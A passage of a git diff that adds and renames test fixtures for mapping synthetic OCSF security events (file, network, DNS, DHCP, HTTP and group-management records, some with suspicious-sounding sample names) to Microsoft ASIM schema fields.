Dvc: "dhcp1", + DvcHostname: "dhcp1", + DvcFQDN: "dhcp1", + EventSchema: "DhcpEvent", + EventSchemaVersion: "0.1.1", + EventType: "Assign", + SrcHostname: "client1", + SrcIpAddr: 10.0.0.50, + SrcMacAddr: "00:11:22:33:44:55", + AdditionalFields: { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, + }, + name: "asim.dhcp_event", +} diff --git a/microsoft/tests/asim/ocsf/dns_activity.tql b/microsoft/tests/asim/ocsf/dns_activity.tql new file mode 100644 index 0000000..2f140d1 --- /dev/null +++ b/microsoft/tests/asim/ocsf/dns_activity.tql @@ -0,0 +1,188 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, +}, { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, +}, { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, +}, { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, +}, { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, +}, { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, +} +where class_uid == 4003 +microsoft::asim::ocsf::map +name = @name +sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dns_activity.txt b/microsoft/tests/asim/ocsf/dns_activity.txt new file mode 100644 index 0000000..6d4567a --- /dev/null +++ b/microsoft/tests/asim/ocsf/dns_activity.txt @@ -0,0 +1,59 @@ +{ + EventCount: 1, + EventStartTime: 2026-01-01T00:00:02Z, + EventEndTime: 2026-01-01T00:00:02Z, + EventProduct: "DNS", + EventVendor: "Microsoft", + EventOriginalUid: "dns-1", + EventUid: "dns-1", + EventOriginalType: "400301", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "dns1", + DvcHostname: "dns1", + DvcFQDN: "dns1", + EventSchema: "Dns", + EventSchemaVersion: "0.1.7", + EventType: "Query", + EventSubType: "request", + DnsQuery: "example.org", + DnsQueryTypeName: "A", + DnsQueryClassName: "IN", + EventResultDetails: "NA", + SrcIpAddr: 10.0.0.1, + SrcHostname: null, + DstIpAddr: null, + DstHostname: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, + }, + name: "asim.dns", +} diff --git a/microsoft/tests/ocsf-to-asim/audit.tql b/microsoft/tests/asim/ocsf/event_log_activity.tql similarity index 100% rename from microsoft/tests/ocsf-to-asim/audit.tql rename to microsoft/tests/asim/ocsf/event_log_activity.tql diff --git a/microsoft/tests/ocsf-to-asim/audit.txt b/microsoft/tests/asim/ocsf/event_log_activity.txt similarity index 100% rename from microsoft/tests/ocsf-to-asim/audit.txt rename to microsoft/tests/asim/ocsf/event_log_activity.txt diff --git a/microsoft/tests/asim/ocsf/file_system_activity.tql b/microsoft/tests/asim/ocsf/file_system_activity.tql new file mode 100644 index 0000000..71badea --- /dev/null +++ b/microsoft/tests/asim/ocsf/file_system_activity.tql @@ -0,0 +1,188 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, +}, { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, +}, { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, +}, { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, +}, { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, +}, { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, +} +where class_uid == 1001 +microsoft::asim::ocsf::map +name = @name +sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/file_system_activity.txt b/microsoft/tests/asim/ocsf/file_system_activity.txt new file mode 100644 index 0000000..cf45713 --- /dev/null +++ b/microsoft/tests/asim/ocsf/file_system_activity.txt @@ -0,0 +1,117 @@ +{ + EventCount: 1, + EventStartTime: 2026-01-01T00:00:00Z, + EventEndTime: 2026-01-01T00:00:00Z, + EventProduct: "Endpoint", + EventVendor: "Microsoft", + EventOriginalUid: "file-1", + EventUid: "file-1", + EventOriginalType: "100101", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "host1", + DvcHostname: "host1", + DvcFQDN: "host1", + EventSchema: "FileEvent", + EventSchemaVersion: "0.2.2", + EventType: "FileCreated", + ActorUsername: "alice", + ActorUserId: null, + TargetFilePath: "C:\\tmp\\payload.exe", + TargetFileName: "payload.exe", + TargetFilePathType: "Windows Local", + AdditionalFields: { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + }, + name: "asim.file_event", +} +{ + EventCount: 1, + EventStartTime: 2026-01-01T00:00:05Z, + EventEndTime: 2026-01-01T00:00:05Z, + EventProduct: "Endpoint", + EventVendor: "Microsoft", + EventOriginalUid: "file-2", + EventUid: "file-2", + EventOriginalType: "100105", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "host1", + DvcHostname: "host1", + DvcFQDN: "host1", + EventSchema: "FileEvent", + EventSchemaVersion: "0.2.2", + EventType: "FileRenamed", + ActorUsername: "alice", + ActorUserId: null, + TargetFilePath: "C:\\tmp\\invoice.pdf.exe", + TargetFileName: "invoice.pdf.exe", + SrcFilePath: "C:\\tmp\\payload.exe", + SrcFileName: "payload.exe", + SrcFilePathType: "Windows Local", + TargetFilePathType: "Windows Local", + AdditionalFields: { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, + }, + name: "asim.file_event", +} diff --git a/microsoft/tests/asim/ocsf/group_management.tql b/microsoft/tests/asim/ocsf/group_management.tql new file mode 100644 index 0000000..e80f66c --- /dev/null +++ b/microsoft/tests/asim/ocsf/group_management.tql @@ -0,0 +1,82 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3001, + class_name: "Account Change", + type_uid: 300101, + type_name: "Account Change: Create", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + metadata: { + event_code: "4720", + original_event_uid: "98767", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + user: { + domain: "CORP", + name: "backdoor_svc", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, +}, { + activity_id: 3, + activity_name: "Add User", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3006, + class_name: "Group Management", + type_uid: 300603, + type_name: "Group Management: Add User", + time: 2024-03-23T12:34:57Z, + severity_id: 1, + metadata: { + event_code: "4728", + original_event_uid: "98776", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + group: { + domain: "CORP", + name: "DomainAdmins", + uid: "S-1-5-21-3107921522-2185401913-891411500-512", + }, + user: { + name: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, +} +@name = "ocsf.group_management" +where class_uid == 3006 +microsoft::asim::ocsf::map +name = @name +sort EventOriginalType diff --git a/microsoft/tests/ocsf-to-asim/user-management.txt b/microsoft/tests/asim/ocsf/group_management.txt similarity index 52% rename from microsoft/tests/ocsf-to-asim/user-management.txt rename to microsoft/tests/asim/ocsf/group_management.txt index 01f6ae5..7f01855 100644 --- a/microsoft/tests/ocsf-to-asim/user-management.txt +++ b/microsoft/tests/asim/ocsf/group_management.txt @@ -1,74 +1,3 @@ -{ - EventCount: 1, - EventStartTime: 2024-03-23T12:34:56.789012300Z, - EventEndTime: 2024-03-23T12:34:56.789012300Z, - EventProduct: "Microsoft-Windows-Security-Auditing", - EventVendor: "Microsoft", - EventOriginalUid: "98767", - EventUid: "98767", - EventOriginalType: "4720", - EventSeverity: "Informational", - EventResult: "NA", - Dvc: "DC01.corp.local", - DvcHostname: "DC01.corp.local", - DvcFQDN: "DC01.corp.local", - EventSchema: "UserManagement", - EventSchemaVersion: "0.1.2", - ActorUsername: "CORP\\jdoe", - ActorUsernameType: "Windows", - ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", - ActorUserIdType: "SID", - EventType: "UserCreated", - TargetUsername: "CORP\\backdoor_svc", - TargetUsernameType: "Windows", - TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", - TargetUserIdType: "SID", - GroupName: null, - GroupId: null, - GroupIdType: null, - SrcIpAddr: null, - SrcHostname: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Create", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3001, - class_name: "Account Change", - type_uid: 300101, - type_name: "Account Change: Create", - time: 2024-03-23T12:34:56.789012300Z, - severity_id: 1, - metadata: { - event_code: "4720", - original_event_uid: "98767", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - actor: { - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - user: { - domain: "CORP", - name: "backdoor_svc", - uid: "S-1-5-21-3107921522-2185401913-891411500-1500", - }, - }, - name: "asim.user_management", -} { EventCount: 1, EventStartTime: 2024-03-23T12:34:57Z, diff --git a/microsoft/tests/asim/ocsf/http_activity.tql b/microsoft/tests/asim/ocsf/http_activity.tql new file mode 100644 index 0000000..03d4dce --- /dev/null +++ b/microsoft/tests/asim/ocsf/http_activity.tql @@ -0,0 +1,188 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, +}, { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, +}, { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, +}, { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, +}, { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, +}, { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, +} +where class_uid == 4002 +microsoft::asim::ocsf::map +name = @name +sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/http_activity.txt b/microsoft/tests/asim/ocsf/http_activity.txt new file mode 100644 index 0000000..cd66053 --- /dev/null +++ b/microsoft/tests/asim/ocsf/http_activity.txt @@ -0,0 +1,53 @@ +{ + EventCount: 1, + EventStartTime: 2026-01-01T00:00:04Z, + EventEndTime: 2026-01-01T00:00:04Z, + EventProduct: "Proxy", + EventVendor: "Microsoft", + EventOriginalUid: "web-1", + EventUid: "web-1", + EventOriginalType: "400203", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "proxy1", + DvcHostname: "proxy1", + DvcFQDN: "proxy1", + EventSchema: "WebSession", + EventSchemaVersion: "0.2.7", + EventType: "HTTPsession", + Url: "https://example.org/index.html", + HttpRequestMethod: "GET", + EventResultDetails: "200", + AdditionalFields: { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, + }, + name: "asim.web_session", +} diff --git a/microsoft/tests/ocsf-to-asim/unsupported-strict.tql b/microsoft/tests/asim/ocsf/map.tql similarity index 100% rename from microsoft/tests/ocsf-to-asim/unsupported-strict.tql rename to microsoft/tests/asim/ocsf/map.tql diff --git a/microsoft/tests/ocsf-to-asim/unsupported-strict.txt b/microsoft/tests/asim/ocsf/map.txt similarity index 100% rename from microsoft/tests/ocsf-to-asim/unsupported-strict.txt rename to microsoft/tests/asim/ocsf/map.txt diff --git a/microsoft/tests/asim/ocsf/network_activity.tql b/microsoft/tests/asim/ocsf/network_activity.tql new file mode 100644 index 0000000..fcd58a4 --- /dev/null +++ b/microsoft/tests/asim/ocsf/network_activity.tql @@ -0,0 +1,188 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, +}, { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, +}, { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, +}, { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, +}, { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, +}, { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, +} +where class_uid == 4001 +microsoft::asim::ocsf::map +name = @name +sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/network_activity.txt b/microsoft/tests/asim/ocsf/network_activity.txt new file mode 100644 index 0000000..005e7cb --- /dev/null +++ b/microsoft/tests/asim/ocsf/network_activity.txt @@ -0,0 +1,61 @@ +{ + EventCount: 1, + EventStartTime: 2026-01-01T00:00:01Z, + EventEndTime: 2026-01-01T00:00:01Z, + EventProduct: "Firewall", + EventVendor: "Microsoft", + EventOriginalUid: "net-1", + EventUid: "net-1", + EventOriginalType: "400106", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "fw1", + DvcHostname: "fw1", + DvcFQDN: "fw1", + EventSchema: "NetworkSession", + EventSchemaVersion: "0.2.7", + EventType: "Flow", + SrcIpAddr: 10.0.0.1, + SrcHostname: null, + SrcPortNumber: 12345, + DstIpAddr: 10.0.0.2, + DstHostname: null, + DstPortNumber: 443, + SrcBytes: 100, + DstBytes: 200, + AdditionalFields: { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, + }, + name: "asim.network_session", +} diff --git a/microsoft/tests/ocsf-to-asim/process.tql b/microsoft/tests/asim/ocsf/process_activity.tql similarity index 100% rename from microsoft/tests/ocsf-to-asim/process.tql rename to microsoft/tests/asim/ocsf/process_activity.tql diff --git a/microsoft/tests/ocsf-to-asim/process.txt b/microsoft/tests/asim/ocsf/process_activity.txt similarity index 100% rename from microsoft/tests/ocsf-to-asim/process.txt rename to microsoft/tests/asim/ocsf/process_activity.txt diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.txt b/microsoft/tests/ocsf-to-asim/direct-targets.txt deleted file mode 100644 index 0b7405c..0000000 --- a/microsoft/tests/ocsf-to-asim/direct-targets.txt +++ /dev/null @@ -1,339 +0,0 @@ -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:03Z, - EventEndTime: 2026-01-01T00:00:03Z, - EventProduct: "DHCP", - EventVendor: "Microsoft", - EventOriginalUid: "dhcp-1", - EventUid: "dhcp-1", - EventOriginalType: "400405", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "dhcp1", - DvcHostname: "dhcp1", - DvcFQDN: "dhcp1", - EventSchema: "DhcpEvent", - EventSchemaVersion: "0.1.1", - EventType: "Assign", - SrcHostname: "client1", - SrcIpAddr: 10.0.0.50, - SrcMacAddr: "00:11:22:33:44:55", - AdditionalFields: { - activity_id: 5, - activity_name: "Ack", - category_uid: 4, - class_uid: 4004, - class_name: "DHCP Activity", - type_uid: 400405, - time: 2026-01-01T00:00:03Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "dhcp-1", - product: { - name: "DHCP", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dhcp1", - }, - src_endpoint: { - hostname: "client1", - ip: 10.0.0.50, - mac: "00:11:22:33:44:55", - }, - }, - name: "asim.dhcp_event", -} -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:02Z, - EventEndTime: 2026-01-01T00:00:02Z, - EventProduct: "DNS", - EventVendor: "Microsoft", - EventOriginalUid: "dns-1", - EventUid: "dns-1", - EventOriginalType: "400301", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "dns1", - DvcHostname: "dns1", - DvcFQDN: "dns1", - EventSchema: "Dns", - EventSchemaVersion: "0.1.7", - EventType: "Query", - EventSubType: "request", - DnsQuery: "example.org", - DnsQueryTypeName: "A", - DnsQueryClassName: "IN", - EventResultDetails: "NA", - SrcIpAddr: 10.0.0.1, - SrcHostname: null, - DstIpAddr: null, - DstHostname: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - name: "DNS", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, - }, - name: "asim.dns", -} -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:00Z, - EventEndTime: 2026-01-01T00:00:00Z, - EventProduct: "Endpoint", - EventVendor: "Microsoft", - EventOriginalUid: "file-1", - EventUid: "file-1", - EventOriginalType: "100101", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "host1", - DvcHostname: "host1", - DvcFQDN: "host1", - EventSchema: "FileEvent", - EventSchemaVersion: "0.2.2", - EventType: "FileCreated", - ActorUsername: "alice", - ActorUserId: null, - TargetFilePath: "C:\\tmp\\payload.exe", - TargetFileName: "payload.exe", - 